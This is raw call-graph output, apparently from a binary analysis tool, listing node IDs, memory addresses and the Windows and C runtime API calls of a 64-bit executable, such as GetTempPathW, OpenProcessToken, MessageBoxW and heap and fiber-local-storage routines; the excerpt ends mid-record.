16224 7ff7c2669400 2 API calls 16223->16224 16225 7ff7c2668b5c 16224->16225 17243 7ff7c26782a8 16225->17243 16227 7ff7c2668b6a __std_exception_destroy 16227->16007 16229 7ff7c26690f5 16228->16229 17261 7ff7c2668760 GetCurrentProcess OpenProcessToken 16229->17261 16232 7ff7c2668760 7 API calls 16233 7ff7c2669121 16232->16233 16234 7ff7c266913a 16233->16234 16235 7ff7c2669154 16233->16235 16236 7ff7c26626b0 48 API calls 16234->16236 16237 7ff7c26626b0 48 API calls 16235->16237 16238 7ff7c2669152 16236->16238 16239 7ff7c2669167 LocalFree LocalFree 16237->16239 16238->16239 16240 7ff7c2669183 16239->16240 16242 7ff7c266918f 16239->16242 17271 7ff7c2662b50 16240->17271 16243 7ff7c266c5c0 _log10_special 8 API calls 16242->16243 16244 7ff7c2663c55 16243->16244 16244->16012 16245 7ff7c2668850 16244->16245 16246 7ff7c2668868 16245->16246 16247 7ff7c266888c 16246->16247 16248 7ff7c26688ea GetTempPathW GetCurrentProcessId 16246->16248 16250 7ff7c2668a20 14 API calls 16247->16250 17280 7ff7c26625c0 16248->17280 16251 7ff7c2668898 16250->16251 17287 7ff7c26681c0 16251->17287 16257 7ff7c2668918 __std_exception_destroy 16265 7ff7c2668955 __std_exception_destroy 16257->16265 17284 7ff7c2678bd8 16257->17284 16262 7ff7c26689c4 __std_exception_destroy 16264 7ff7c266c5c0 _log10_special 8 API calls 16262->16264 16266 7ff7c2663cbb 16264->16266 16265->16262 16270 7ff7c2669400 2 API calls 16265->16270 16266->16012 16266->16024 16271 7ff7c26689a1 16270->16271 16272 7ff7c26689d9 16271->16272 16273 7ff7c26689a6 16271->16273 16279 7ff7c2669422 MultiByteToWideChar 16278->16279 16282 7ff7c2669446 16278->16282 16280 7ff7c266945c __std_exception_destroy 16279->16280 16279->16282 16280->16023 16281 7ff7c2669463 MultiByteToWideChar 16281->16280 16282->16280 16282->16281 16295 7ff7c26633ce memcpy_s 16283->16295 16284 7ff7c266c5c0 _log10_special 8 API calls 16286 7ff7c2663664 16284->16286 16285 7ff7c26635c7 16285->16284 16286->16030 16302 7ff7c26690c0 LocalFree 16286->16302 16288 7ff7c2661c80 49 API calls 16288->16295 16289 7ff7c26635e2 16291 7ff7c2662710 54 API calls 16289->16291 16291->16285 16294 7ff7c26635c9 16297 7ff7c2662710 54 API calls 16294->16297 16295->16285 16295->16288 16295->16289 16295->16294 16296 7ff7c2662a50 54 API calls 16295->16296 16300 7ff7c26635d0 16295->16300 17558 7ff7c2664550 16295->17558 17564 7ff7c2667e10 16295->17564 17576 7ff7c2661600 16295->17576 17624 7ff7c2667110 16295->17624 17628 7ff7c2664180 16295->17628 17672 7ff7c2664440 16295->17672 16296->16295 16297->16285 16301 7ff7c2662710 54 API calls 16300->16301 16301->16285 16304 7ff7c2661ca5 16303->16304 16305 7ff7c26749f4 49 API calls 16304->16305 16306 7ff7c2661cc8 16305->16306 16306->15962 16308 7ff7c2669400 2 API calls 16307->16308 16309 7ff7c2668ba4 16308->16309 16310 7ff7c26782a8 38 API calls 16309->16310 16311 7ff7c2668bb6 __std_exception_destroy 16310->16311 16311->15975 16313 7ff7c26645bc 16312->16313 16314 7ff7c2669400 2 API calls 16313->16314 16315 7ff7c26645e4 16314->16315 16316 7ff7c2669400 2 API calls 16315->16316 16317 7ff7c26645f7 16316->16317 17855 7ff7c2676004 16317->17855 16320 7ff7c266c5c0 _log10_special 8 API calls 16321 7ff7c266392b 16320->16321 16321->15965 16322 7ff7c2667f80 16321->16322 16323 7ff7c2667fa4 16322->16323 16324 7ff7c2670744 73 API calls 16323->16324 16329 7ff7c266807b __std_exception_destroy 16323->16329 16325 7ff7c2667fc0 16324->16325 16325->16329 18246 7ff7c2677938 16325->18246 16327 7ff7c2670744 73 API calls 16330 7ff7c2667fd5 16327->16330 16328 7ff7c267040c _fread_nolock 53 API calls 16328->16330 16329->15969 16330->16327 16330->16328 16330->16329 16332 7ff7c26700ec 16331->16332 18261 7ff7c266fe98 16332->18261 16334 7ff7c2670105 16334->15965 16336 7ff7c266c8c0 16335->16336 16337 7ff7c2662734 GetCurrentProcessId 16336->16337 16338 7ff7c2661c80 49 API calls 16337->16338 16339 7ff7c2662787 16338->16339 16340 7ff7c26749f4 49 API calls 16339->16340 16341 7ff7c26627cf 16340->16341 16342 7ff7c2662620 12 API calls 16341->16342 16343 7ff7c26627f1 16342->16343 16344 7ff7c266c5c0 _log10_special 8 API calls 16343->16344 16345 7ff7c2662801 16344->16345 16345->16030 16347 7ff7c266c5c9 16346->16347 16348 7ff7c2663ca7 16347->16348 16349 7ff7c266c950 IsProcessorFeaturePresent 16347->16349 16348->16087 16350 7ff7c266c968 16349->16350 18272 7ff7c266cb48 RtlCaptureContext 16350->18272 16356 7ff7c2661c80 49 API calls 16355->16356 16357 7ff7c26644ed 16356->16357 16357->16006 16359 7ff7c2661c80 49 API calls 16358->16359 16360 7ff7c2664650 16359->16360 16360->16024 16362 7ff7c2666dc5 16361->16362 16363 7ff7c2663e6c 16362->16363 16364 7ff7c2674f78 memcpy_s 11 API calls 16362->16364 16367 7ff7c2667330 16363->16367 16365 7ff7c2666dd2 16364->16365 16366 7ff7c2662910 54 API calls 16365->16366 16366->16363 18277 7ff7c2661470 16367->18277 16369 7ff7c2667358 18383 7ff7c2666350 16435->18383 16443 7ff7c2663399 16465 7ff7c267a5cc 16448->16465 16451 7ff7c267a8bf 16451->16135 16564 7ff7c26754dc EnterCriticalSection 16458->16564 16466 7ff7c267a5e8 GetLastError 16465->16466 16467 7ff7c267a623 16465->16467 16468 7ff7c267a5f8 16466->16468 16467->16451 16471 7ff7c267a638 16467->16471 16478 7ff7c267b400 16468->16478 16472 7ff7c267a66c 16471->16472 16473 7ff7c267a654 GetLastError SetLastError 16471->16473 16472->16451 16474 7ff7c267a970 IsProcessorFeaturePresent 16472->16474 16473->16472 16475 7ff7c267a983 16474->16475 16556 7ff7c267a684 16475->16556 16479 7ff7c267b43a FlsSetValue 16478->16479 16480 7ff7c267b41f FlsGetValue 16478->16480 16481 7ff7c267a613 SetLastError 16479->16481 16483 7ff7c267b447 16479->16483 16480->16481 16482 7ff7c267b434 16480->16482 16481->16467 16482->16479 16495 7ff7c267ec08 16483->16495 16486 7ff7c267b474 FlsSetValue 16488 7ff7c267b492 16486->16488 16489 7ff7c267b480 FlsSetValue 16486->16489 16487 7ff7c267b464 FlsSetValue 16490 7ff7c267b46d 16487->16490 16508 7ff7c267af64 16488->16508 16489->16490 16502 7ff7c267a9b8 16490->16502 16498 7ff7c267ec19 memcpy_s 16495->16498 16496 7ff7c267ec6a 16516 7ff7c2674f78 16496->16516 16497 7ff7c267ec4e HeapAlloc 16497->16498 16499 7ff7c267b456 16497->16499 16498->16496 16498->16497 16513 7ff7c2683600 16498->16513 16499->16486 16499->16487 16503 7ff7c267a9bd RtlFreeHeap 16502->16503 16507 7ff7c267a9ec 16502->16507 16504 7ff7c267a9d8 GetLastError 16503->16504 16503->16507 16505 7ff7c267a9e5 Concurrency::details::SchedulerProxy::DeleteThis 16504->16505 16506 7ff7c2674f78 memcpy_s 9 API calls 16505->16506 16506->16507 16507->16481 16542 7ff7c267ae3c 16508->16542 16519 7ff7c2683640 16513->16519 16525 7ff7c267b338 GetLastError 16516->16525 16518 7ff7c2674f81 16518->16499 16524 7ff7c2680348 EnterCriticalSection 16519->16524 16526 7ff7c267b35c 16525->16526 16527 7ff7c267b379 FlsSetValue 16525->16527 16526->16527 16531 7ff7c267b369 16526->16531 16528 7ff7c267b38b 16527->16528 16527->16531 16530 7ff7c267ec08 memcpy_s 5 API calls 16528->16530 16529 7ff7c267b3e5 SetLastError 16529->16518 16532 7ff7c267b39a 16530->16532 16531->16529 16533 7ff7c267b3b8 FlsSetValue 16532->16533 16534 7ff7c267b3a8 FlsSetValue 16532->16534 16536 7ff7c267b3d6 16533->16536 16537 7ff7c267b3c4 FlsSetValue 16533->16537 16535 7ff7c267b3b1 16534->16535 16539 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16535->16539 16538 7ff7c267af64 memcpy_s 5 API calls 16536->16538 16537->16535 16540 7ff7c267b3de 16538->16540 16539->16531 16541 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16540->16541 16541->16529 16554 7ff7c2680348 EnterCriticalSection 16542->16554 16557 7ff7c267a6be _isindst memcpy_s 16556->16557 16558 7ff7c267a6e6 RtlCaptureContext RtlLookupFunctionEntry 16557->16558 16559 7ff7c267a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16558->16559 16560 7ff7c267a720 RtlVirtualUnwind 16558->16560 16563 7ff7c267a7a8 _isindst 16559->16563 16560->16559 16561 7ff7c266c5c0 _log10_special 8 API calls 16562 7ff7c267a7c7 GetCurrentProcess TerminateProcess 16561->16562 16563->16561 16566 7ff7c26636bc GetModuleFileNameW 16565->16566 16566->16139 16566->16140 16568 7ff7c266932f FindClose 16567->16568 16569 7ff7c2669342 16567->16569 16568->16569 16570 7ff7c266c5c0 _log10_special 8 API calls 16569->16570 16571 7ff7c266371a 16570->16571 16571->16144 16571->16145 16573 7ff7c266c8c0 16572->16573 16574 7ff7c2662c70 GetCurrentProcessId 16573->16574 16603 7ff7c26626b0 16574->16603 16576 7ff7c2662cb9 16607 7ff7c2674c48 16576->16607 16579 7ff7c26626b0 48 API calls 16580 7ff7c2662d34 FormatMessageW 16579->16580 16582 7ff7c2662d6d 16580->16582 16583 7ff7c2662d7f MessageBoxW 16580->16583 16584 7ff7c26626b0 48 API calls 16582->16584 16585 7ff7c266c5c0 _log10_special 8 API calls 16583->16585 16584->16583 16586 7ff7c2662daf 16585->16586 16586->16151 16588 7ff7c2663730 16587->16588 16589 7ff7c26693b0 GetFinalPathNameByHandleW CloseHandle 16587->16589 16588->16153 16588->16154 16589->16588 16591 7ff7c2662834 16590->16591 16592 7ff7c26626b0 48 API calls 16591->16592 16593 7ff7c2662887 16592->16593 16594 7ff7c2674c48 48 API calls 16593->16594 16595 7ff7c26628d0 MessageBoxW 16594->16595 16596 7ff7c266c5c0 _log10_special 8 API calls 16595->16596 16597 7ff7c2662900 16596->16597 16597->16151 16599 7ff7c26694da WideCharToMultiByte 16598->16599 16600 7ff7c2669505 16598->16600 16599->16600 16602 7ff7c266951b __std_exception_destroy 16599->16602 16601 7ff7c2669522 WideCharToMultiByte 16600->16601 16600->16602 16601->16602 16602->16152 16604 7ff7c26626d5 16603->16604 16605 7ff7c2674c48 48 API calls 16604->16605 16606 7ff7c26626f8 16605->16606 16606->16576 16610 7ff7c2674ca2 16607->16610 16608 7ff7c2674cc7 16609 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16608->16609 16624 7ff7c2674cf1 16609->16624 16610->16608 16611 7ff7c2674d03 16610->16611 16625 7ff7c2673000 16611->16625 16614 7ff7c266c5c0 _log10_special 8 API calls 16616 7ff7c2662d04 16614->16616 16615 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16615->16624 16616->16579 16617 7ff7c2674de4 16617->16615 16618 7ff7c2674db9 16621 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16618->16621 16619 7ff7c2674e0a 16619->16617 16620 7ff7c2674e14 16619->16620 16623 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16620->16623 16621->16624 16622 7ff7c2674db0 16622->16617 16622->16618 16623->16624 16624->16614 16626 7ff7c267303e 16625->16626 16627 7ff7c267302e 16625->16627 16628 7ff7c2673047 16626->16628 16633 7ff7c2673075 16626->16633 16629 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16627->16629 16630 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16628->16630 16631 7ff7c267306d 16629->16631 16630->16631 16631->16617 16631->16618 16631->16619 16631->16622 16633->16627 16633->16631 16636 7ff7c2673a14 16633->16636 16669 7ff7c2673460 16633->16669 16706 7ff7c2672bf0 16633->16706 16637 7ff7c2673ac7 16636->16637 16638 7ff7c2673a56 16636->16638 16641 7ff7c2673acc 16637->16641 16642 7ff7c2673b20 16637->16642 16639 7ff7c2673a5c 16638->16639 16640 7ff7c2673af1 16638->16640 16643 7ff7c2673a61 16639->16643 16644 7ff7c2673a90 16639->16644 16729 7ff7c2671dc4 16640->16729 16645 7ff7c2673ace 16641->16645 16646 7ff7c2673b01 16641->16646 16648 7ff7c2673b37 16642->16648 16650 7ff7c2673b2a 16642->16650 16655 7ff7c2673b2f 16642->16655 16643->16648 16651 7ff7c2673a67 16643->16651 16644->16651 16644->16655 16649 7ff7c2673a70 16645->16649 16658 7ff7c2673add 16645->16658 16736 7ff7c26719b4 16646->16736 16743 7ff7c267471c 16648->16743 16668 7ff7c2673b60 16649->16668 16709 7ff7c26741c8 16649->16709 16650->16640 16650->16655 16651->16649 16656 7ff7c2673aa2 16651->16656 16664 7ff7c2673a8b 16651->16664 16655->16668 16747 7ff7c26721d4 16655->16747 16656->16668 16719 7ff7c2674504 16656->16719 16658->16640 16660 7ff7c2673ae2 16658->16660 16660->16668 16725 7ff7c26745c8 16660->16725 16661 7ff7c266c5c0 _log10_special 8 API calls 16663 7ff7c2673e5a 16661->16663 16663->16633 16667 7ff7c2673d4c 16664->16667 16664->16668 16754 7ff7c2674830 16664->16754 16667->16668 16760 7ff7c267ea78 16667->16760 16668->16661 16670 7ff7c267346e 16669->16670 16671 7ff7c2673484 16669->16671 16673 7ff7c2673ac7 16670->16673 16674 7ff7c2673a56 16670->16674 16675 7ff7c26734c4 16670->16675 16672 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16671->16672 16671->16675 16672->16675 16678 7ff7c2673acc 16673->16678 16679 7ff7c2673b20 16673->16679 16676 7ff7c2673a5c 16674->16676 16677 7ff7c2673af1 16674->16677 16675->16633 16680 7ff7c2673a61 16676->16680 16681 7ff7c2673a90 16676->16681 16684 7ff7c2671dc4 38 API calls 16677->16684 16682 7ff7c2673ace 16678->16682 16683 7ff7c2673b01 16678->16683 16685 7ff7c2673b37 16679->16685 16687 7ff7c2673b2a 16679->16687 16691 7ff7c2673b2f 16679->16691 16680->16685 16688 7ff7c2673a67 16680->16688 16681->16688 16681->16691 16686 7ff7c2673a70 16682->16686 16695 7ff7c2673add 16682->16695 16689 7ff7c26719b4 38 API calls 16683->16689 16702 7ff7c2673a8b 16684->16702 16692 7ff7c267471c 45 API calls 16685->16692 16690 7ff7c26741c8 47 API calls 16686->16690 16705 7ff7c2673b60 16686->16705 16687->16677 16687->16691 16688->16686 16693 7ff7c2673aa2 16688->16693 16688->16702 16689->16702 16690->16702 16694 7ff7c26721d4 38 API calls 16691->16694 16691->16705 16692->16702 16696 7ff7c2674504 46 API calls 16693->16696 16693->16705 16694->16702 16695->16677 16697 7ff7c2673ae2 16695->16697 16696->16702 16699 7ff7c26745c8 37 API calls 16697->16699 16697->16705 16698 7ff7c266c5c0 _log10_special 8 API calls 16700 7ff7c2673e5a 16698->16700 16699->16702 16700->16633 16701 7ff7c2674830 45 API calls 16704 7ff7c2673d4c 16701->16704 16702->16701 16702->16704 16702->16705 16703 7ff7c267ea78 46 API calls 16703->16704 16704->16703 16704->16705 16705->16698 16986 7ff7c2671038 16706->16986 16710 7ff7c26741ee 16709->16710 16772 7ff7c2670bf0 16710->16772 16714 7ff7c2674333 16717 7ff7c2674830 45 API calls 16714->16717 16718 7ff7c26743c1 16714->16718 16716 7ff7c2674830 45 API calls 16716->16714 16717->16718 16718->16664 16721 7ff7c2674539 16719->16721 16720 7ff7c2674557 16724 7ff7c267ea78 46 API calls 16720->16724 16721->16720 16722 7ff7c267457e 16721->16722 16723 7ff7c2674830 45 API calls 16721->16723 16722->16664 16723->16720 16724->16722 16726 7ff7c26745e9 16725->16726 16727 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16726->16727 16728 7ff7c267461a 16726->16728 16727->16728 16728->16664 16730 7ff7c2671df7 16729->16730 16731 7ff7c2671e26 16730->16731 16733 7ff7c2671ee3 16730->16733 16735 7ff7c2671e63 16731->16735 16918 7ff7c2670c98 16731->16918 16734 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16733->16734 16734->16735 16735->16664 16738 7ff7c26719e7 16736->16738 16737 7ff7c2671a16 16739 7ff7c2670c98 12 API calls 16737->16739 16742 7ff7c2671a53 16737->16742 16738->16737 16740 7ff7c2671ad3 16738->16740 16739->16742 16741 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16740->16741 16741->16742 16742->16664 16744 7ff7c267475f 16743->16744 16746 7ff7c2674763 __crtLCMapStringW 16744->16746 16926 7ff7c26747b8 16744->16926 16746->16664 16748 7ff7c2672207 16747->16748 16749 7ff7c2672236 16748->16749 16751 7ff7c26722f3 16748->16751 16750 7ff7c2670c98 12 API calls 16749->16750 16753 7ff7c2672273 16749->16753 16750->16753 16752 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16751->16752 16752->16753 16753->16664 16755 7ff7c2674847 16754->16755 16930 7ff7c267da28 16755->16930 16761 7ff7c267eab7 16760->16761 16762 7ff7c267eaa9 16760->16762 16761->16667 16762->16761 16763 7ff7c267ead7 16762->16763 16764 7ff7c2674830 45 API calls 16762->16764 16765 7ff7c267eae8 16763->16765 16766 7ff7c267eb0f 16763->16766 16764->16763 16976 7ff7c2680110 16765->16976 16766->16761 16768 7ff7c267eb9a 16766->16768 16769 7ff7c267eb39 16766->16769 16770 7ff7c267f910 _fread_nolock MultiByteToWideChar 16768->16770 16769->16761 16979 7ff7c267f910 16769->16979 16770->16761 16773 7ff7c2670c27 16772->16773 16774 7ff7c2670c16 16772->16774 16773->16774 16802 7ff7c267d66c 16773->16802 16780 7ff7c267e5e0 16774->16780 16777 7ff7c2670c68 16779 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16777->16779 16778 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16778->16777 16779->16774 16781 7ff7c267e5fd 16780->16781 16782 7ff7c267e630 16780->16782 16783 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16781->16783 16782->16781 16784 7ff7c267e662 16782->16784 16792 7ff7c2674311 16783->16792 16789 7ff7c267e775 16784->16789 16797 7ff7c267e6aa 16784->16797 16785 7ff7c267e867 16842 7ff7c267dacc 16785->16842 16787 7ff7c267e82d 16835 7ff7c267de64 16787->16835 16788 7ff7c267e7fc 16828 7ff7c267e144 16788->16828 16789->16785 16789->16787 16789->16788 16791 7ff7c267e7bf 16789->16791 16794 7ff7c267e7b5 16789->16794 16818 7ff7c267e374 16791->16818 16792->16714 16792->16716 16794->16787 16796 7ff7c267e7ba 16794->16796 16796->16788 16796->16791 16797->16792 16809 7ff7c267a514 16797->16809 16800 7ff7c267a970 _isindst 17 API calls 16801 7ff7c267e8c4 16800->16801 16803 7ff7c267d6b7 16802->16803 16807 7ff7c267d67b memcpy_s 16802->16807 16804 7ff7c2674f78 memcpy_s 11 API calls 16803->16804 16806 7ff7c2670c54 16804->16806 16805 7ff7c267d69e HeapAlloc 16805->16806 16805->16807 16806->16777 16806->16778 16807->16803 16807->16805 16808 7ff7c2683600 memcpy_s 2 API calls 16807->16808 16808->16807 16810 7ff7c267a52b 16809->16810 16811 7ff7c267a521 16809->16811 16812 7ff7c2674f78 memcpy_s 11 API calls 16810->16812 16811->16810 16816 7ff7c267a546 16811->16816 16813 7ff7c267a532 16812->16813 16851 7ff7c267a950 16813->16851 16814 7ff7c267a53e 16814->16792 16814->16800 16816->16814 16817 7ff7c2674f78 memcpy_s 11 API calls 16816->16817 16817->16813 16854 7ff7c268411c 16818->16854 16822 7ff7c267e41c 16823 7ff7c267e420 16822->16823 16824 7ff7c267e471 16822->16824 16825 7ff7c267e43c 16822->16825 16823->16792 16907 7ff7c267df60 16824->16907 16903 7ff7c267e21c 16825->16903 16829 7ff7c268411c 38 API calls 16828->16829 16830 7ff7c267e18e 16829->16830 16831 7ff7c2683b64 37 API calls 16830->16831 16832 7ff7c267e1de 16831->16832 16833 7ff7c267e1e2 16832->16833 16834 7ff7c267e21c 45 API calls 16832->16834 16833->16792 16834->16833 16836 7ff7c268411c 38 API calls 16835->16836 16837 7ff7c267deaf 16836->16837 16838 7ff7c2683b64 37 API calls 16837->16838 16839 7ff7c267df07 16838->16839 16840 7ff7c267df0b 16839->16840 16841 7ff7c267df60 45 API calls 16839->16841 16840->16792 16841->16840 16843 7ff7c267db44 16842->16843 16844 7ff7c267db11 16842->16844 16846 7ff7c267db5c 16843->16846 16848 7ff7c267dbdd 16843->16848 16845 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16844->16845 16850 7ff7c267db3d memcpy_s 16845->16850 16847 7ff7c267de64 46 API calls 16846->16847 16847->16850 16849 7ff7c2674830 45 API calls 16848->16849 16848->16850 16849->16850 16850->16792 16852 7ff7c267a7e8 _invalid_parameter_noinfo 37 API calls 16851->16852 16853 7ff7c267a969 16852->16853 16853->16814 16855 7ff7c268416f fegetenv 16854->16855 16856 7ff7c2687e9c 37 API calls 16855->16856 16859 7ff7c26841c2 16856->16859 16857 7ff7c26842b2 16860 7ff7c2687e9c 37 API calls 16857->16860 16858 7ff7c26841ef 16862 7ff7c267a514 __std_exception_copy 37 API calls 16858->16862 16859->16857 16863 7ff7c268428c 16859->16863 16864 7ff7c26841dd 16859->16864 16861 7ff7c26842dc 16860->16861 16865 7ff7c2687e9c 37 API calls 16861->16865 16866 7ff7c268426d 16862->16866 16867 7ff7c267a514 __std_exception_copy 37 API calls 16863->16867 16864->16857 16864->16858 16868 7ff7c26842ed 16865->16868 16869 7ff7c2685394 16866->16869 16873 7ff7c2684275 16866->16873 16867->16866 16871 7ff7c2688090 20 API calls 16868->16871 16870 7ff7c267a970 _isindst 17 API calls 16869->16870 16872 7ff7c26853a9 16870->16872 16881 7ff7c2684356 memcpy_s 16871->16881 16874 7ff7c266c5c0 _log10_special 8 API calls 16873->16874 16875 7ff7c267e3c1 16874->16875 16899 7ff7c2683b64 16875->16899 16876 7ff7c26846ff memcpy_s 16877 7ff7c2684a3f 16878 7ff7c2683c80 37 API calls 16877->16878 16885 7ff7c2685157 16878->16885 16879 7ff7c26849eb 16879->16877 16882 7ff7c26853ac memcpy_s 37 API calls 16879->16882 16880 7ff7c2684397 memcpy_s 16893 7ff7c2684cdb memcpy_s 16880->16893 16894 7ff7c26847f3 memcpy_s 16880->16894 16881->16876 16881->16880 16883 7ff7c2674f78 memcpy_s 11 API calls 16881->16883 16882->16877 16884 7ff7c26847d0 16883->16884 16886 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 16884->16886 16887 7ff7c26853ac memcpy_s 37 API calls 16885->16887 16897 7ff7c26851b2 16885->16897 16886->16880 16887->16897 16888 7ff7c2685338 16889 7ff7c2687e9c 37 API calls 16888->16889 16889->16873 16890 7ff7c2674f78 11 API calls memcpy_s 16890->16893 16891 7ff7c2674f78 11 API calls memcpy_s 16891->16894 16892 7ff7c267a950 37 API calls _invalid_parameter_noinfo 16892->16894 16893->16877 16893->16879 16893->16890 16898 7ff7c267a950 37 API calls _invalid_parameter_noinfo 16893->16898 16894->16879 16894->16891 16894->16892 16895 7ff7c2683c80 37 API calls 16895->16897 16896 7ff7c26853ac memcpy_s 37 API calls 16896->16897 16897->16888 16897->16895 16897->16896 16898->16893 16900 7ff7c2683b83 16899->16900 16901 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16900->16901 16902 7ff7c2683bae memcpy_s 16900->16902 16901->16902 16902->16822 16904 7ff7c267e248 memcpy_s 16903->16904 16905 7ff7c2674830 45 API calls 16904->16905 16906 7ff7c267e302 memcpy_s 16904->16906 16905->16906 16906->16823 16908 7ff7c267df9b 16907->16908 16911 7ff7c267dfe8 memcpy_s 16907->16911 16909 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16908->16909 16910 7ff7c267dfc7 16909->16910 16910->16823 16911->16911 16912 7ff7c267e053 16911->16912 16914 7ff7c2674830 45 API calls 16911->16914 16913 7ff7c267a514 __std_exception_copy 37 API calls 16912->16913 16917 7ff7c267e095 memcpy_s 16913->16917 16914->16912 16915 7ff7c267a970 _isindst 17 API calls 16916 7ff7c267e140 16915->16916 16917->16915 16919 7ff7c2670cbe 16918->16919 16920 7ff7c2670ccf 16918->16920 16919->16735 16920->16919 16921 7ff7c267d66c _fread_nolock 12 API calls 16920->16921 16922 7ff7c2670d00 16921->16922 16923 7ff7c2670d14 16922->16923 16924 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16922->16924 16925 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16923->16925 16924->16923 16925->16919 16927 7ff7c26747d6 16926->16927 16929 7ff7c26747de 16926->16929 16928 7ff7c2674830 45 API calls 16927->16928 16928->16929 16929->16746 16931 7ff7c267da41 16930->16931 16933 7ff7c267486f 16930->16933 16931->16933 16938 7ff7c2683374 16931->16938 16934 7ff7c267da94 16933->16934 16935 7ff7c267daad 16934->16935 16937 7ff7c267487f 16934->16937 16935->16937 16973 7ff7c26826c0 16935->16973 16937->16667 16950 7ff7c267b1c0 GetLastError 16938->16950 16941 7ff7c26833ce 16941->16933 16951 7ff7c267b1e4 FlsGetValue 16950->16951 16952 7ff7c267b201 FlsSetValue 16950->16952 16954 7ff7c267b1fb 16951->16954 16969 7ff7c267b1f1 16951->16969 16953 7ff7c267b213 16952->16953 16952->16969 16956 7ff7c267ec08 memcpy_s 11 API calls 16953->16956 16954->16952 16955 7ff7c267b26d SetLastError 16957 7ff7c267b28d 16955->16957 16958 7ff7c267b27a 16955->16958 16959 7ff7c267b222 16956->16959 16960 7ff7c267a574 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16957->16960 16958->16941 16972 7ff7c2680348 EnterCriticalSection 16958->16972 16961 7ff7c267b240 FlsSetValue 16959->16961 16962 7ff7c267b230 FlsSetValue 16959->16962 16963 7ff7c267b292 16960->16963 16965 7ff7c267b25e 16961->16965 16966 7ff7c267b24c FlsSetValue 16961->16966 16964 7ff7c267b239 16962->16964 16967 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16964->16967 16968 7ff7c267af64 memcpy_s 11 API calls 16965->16968 16966->16964 16967->16969 16970 7ff7c267b266 16968->16970 16969->16955 16971 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16970->16971 16971->16955 16974 7ff7c267b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16973->16974 16975 7ff7c26826c9 16974->16975 16982 7ff7c2686df8 16976->16982 16981 7ff7c267f919 MultiByteToWideChar 16979->16981 16985 7ff7c2686e5c 16982->16985 16983 7ff7c266c5c0 _log10_special 8 API calls 16984 7ff7c268012d 16983->16984 16984->16761 16985->16983 16987 7ff7c267106d 16986->16987 16988 7ff7c267107f 16986->16988 16989 7ff7c2674f78 memcpy_s 11 API calls 16987->16989 16990 7ff7c267108d 16988->16990 16995 7ff7c26710c9 16988->16995 16991 7ff7c2671072 16989->16991 16992 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 16990->16992 16993 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 16991->16993 17001 7ff7c267107d 16992->17001 16993->17001 16994 7ff7c2671445 16996 7ff7c2674f78 memcpy_s 11 API calls 16994->16996 16994->17001 16995->16994 16997 7ff7c2674f78 memcpy_s 11 API calls 16995->16997 16998 7ff7c26716d9 16996->16998 16999 7ff7c267143a 16997->16999 17002 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 16998->17002 17000 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 16999->17000 17000->16994 17001->16633 17002->17001 17004 7ff7c2670774 17003->17004 17031 7ff7c26704d4 17004->17031 17006 7ff7c267078d 17006->16168 17043 7ff7c267042c 17007->17043 17011 7ff7c266c8c0 17010->17011 17012 7ff7c2662930 GetCurrentProcessId 17011->17012 17013 7ff7c2661c80 49 API calls 17012->17013 17014 7ff7c2662979 17013->17014 17057 7ff7c26749f4 17014->17057 17019 7ff7c2661c80 49 API calls 17020 7ff7c26629ff 17019->17020 17087 7ff7c2662620 17020->17087 17023 7ff7c266c5c0 _log10_special 8 API calls 17024 7ff7c2662a31 17023->17024 17024->16178 17026 7ff7c2661b89 17025->17026 17027 7ff7c2670189 17025->17027 17026->16178 17026->16207 17028 7ff7c2674f78 memcpy_s 11 API calls 17027->17028 17029 7ff7c267018e 17028->17029 17030 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17029->17030 17030->17026 17032 7ff7c267053e 17031->17032 17033 7ff7c26704fe 17031->17033 17032->17033 17035 7ff7c267054a 17032->17035 17034 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17033->17034 17036 7ff7c2670525 17034->17036 17042 7ff7c26754dc EnterCriticalSection 17035->17042 17036->17006 17044 7ff7c2670456 17043->17044 17055 7ff7c2661a20 17043->17055 17045 7ff7c2670465 memcpy_s 17044->17045 17046 7ff7c26704a2 17044->17046 17044->17055 17049 7ff7c2674f78 memcpy_s 11 API calls 17045->17049 17056 7ff7c26754dc EnterCriticalSection 17046->17056 17051 7ff7c267047a 17049->17051 17053 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17051->17053 17053->17055 17055->16176 17055->16177 17058 7ff7c2674a4e 17057->17058 17059 7ff7c2674a73 17058->17059 17061 7ff7c2674aaf 17058->17061 17060 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17059->17060 17063 7ff7c2674a9d 17060->17063 17096 7ff7c2672c80 17061->17096 17065 7ff7c266c5c0 _log10_special 8 API calls 17063->17065 17064 7ff7c2674b8c 17066 